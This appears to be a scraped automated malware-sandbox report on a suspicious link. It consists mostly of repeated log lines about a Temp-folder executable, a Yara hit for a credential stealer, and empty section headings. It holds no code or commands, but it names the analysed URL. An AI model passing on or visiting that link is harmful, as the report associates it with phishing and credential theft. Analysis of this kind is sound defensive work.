Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation

Yara detected Credential Stealer

Source: Yara match

File source: 0000001D.00000002.2269970604.0000000002F80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Windows Analysis Report
https://gtoyorupaz.emlnk9.com/lt.php?x=3DZy~GDFIXeg6XOu0N28Vuee3aIpj_XxwhphY5TIVnag78B-0Uy.y.e-3I2jmN~w

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Phishing

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Screenshots

Windows Analysis Report https://gtoyorupaz.emlnk9.com/lt.php?x=3DZy~GDFIXeg6XOu0N28Vuee3aIpj_XxwhphY5TIVnag78B-0Uy.y.e-3I2jmN~w

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Phishing

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Screenshots

Windows Analysis Report
https://gtoyorupaz.emlnk9.com/lt.php?x=3DZy~GDFIXeg6XOu0N28Vuee3aIpj_XxwhphY5TIVnag78B-0Uy.y.e-3I2jmN~w